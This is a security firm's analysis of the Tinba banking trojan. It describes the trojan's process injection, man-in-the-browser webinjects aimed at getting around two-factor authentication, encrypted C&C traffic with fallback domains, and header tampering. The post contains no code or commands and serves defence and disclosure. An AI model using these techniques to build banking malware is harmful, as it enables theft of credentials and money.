CSIS Security Group A/S has uncovered a new trojan-banker family which we have named Tinba (Tiny Banker) alias “Zusy”.
Tinba is a small data stealing trojan-banker. It hooks into browsers and steals login data and sniffs on network traffic. As several sophisticated banker-trojan it also uses Man in The Browser (MiTB) tricks and webinjects in order to change the look and feel of certain webpages with the purpose of circumventing Two factor Authentification (2FA) or tricking the infected user to give away additional sensitive data such as credit card data or TANs.
Tinba is the smallest trojan-banker we have ever encountered and it belongs to a complete new family of malware which we expect to be battling in upcoming months.
The code is approx 20KB in size (including config and webinjects) and comes simple and clear without any packing or advanced encryption. Antivirus detection of the analyzed samples is low.
Tinba is upon execution utilizing an injection routine, which is obfuscated to primarily avoid antivirus detection. It allocates new memory space where this specific injection function is stored and injects itself into the newly created process “winver.exe” (Version Reporter Applet) dropped into the windows system folder. Tinba also injects itself into both "explorer.exe" and "svchost.exe" processes.
Tinba uses primarily four different libraries during runtime: ntdll.dll, advapi32.dll, ws2_32.dll and user32.dll. The main components are copied into the [%userprofile%]Application DataDefault as “bin.exe” and the encrypted configuration file “cfg.dat” accompanied by the webinject file named “web.dat”.
As observed in several other Trojan-bankers and advanced malwares, Tinba utilizes a RC4 encryption algorithm when communication with its Command & Control (C&C) servers. Tinba uses four hardcoded domains for its C&C communication. This is done to avoid one domain from being nonresponsive and thus losing communication with its drones. If the first domain does not respond properly, Tinba simply moves on to the next domain down the chain. Updates are retrieved from the C&C server using an encrypted string to EHLO the C&C. If C&C server survives certain checks, then the before mentioned files are downloaded and executed on the infected host. C&C communication is illustrated below.
Tinba uses typical MiTB tricks and injects itself into legitimate processes such as iexplore.exe and firefox.exe. When successfully injected, Tinba reads settings from the configuration files (cfg.dat and web.dat) and intercepts and manipulate traffic through several browser APIs.
The web inject templates are identical to the ones used by ZeuS but also have capability to use special values e.g. %BOTUID% equals to volume serial number.
An interesting observation is the fact that Tinba will modify headers X-FRAME-Options thus being able to inject insecure non HTTPS supported elements from external servers/websites. Tinba, like its equals, targets financial websites, but only a very small list of specific URLs.
We have blocked access to all known Tinba C&C servers in CSIS Secure DNS and thus also protecting Heimdal Pro and Corporate users against data leakage.
Yes, Tinba proves that malware with data stealing capabilities does not have to be 20MB of size ;-)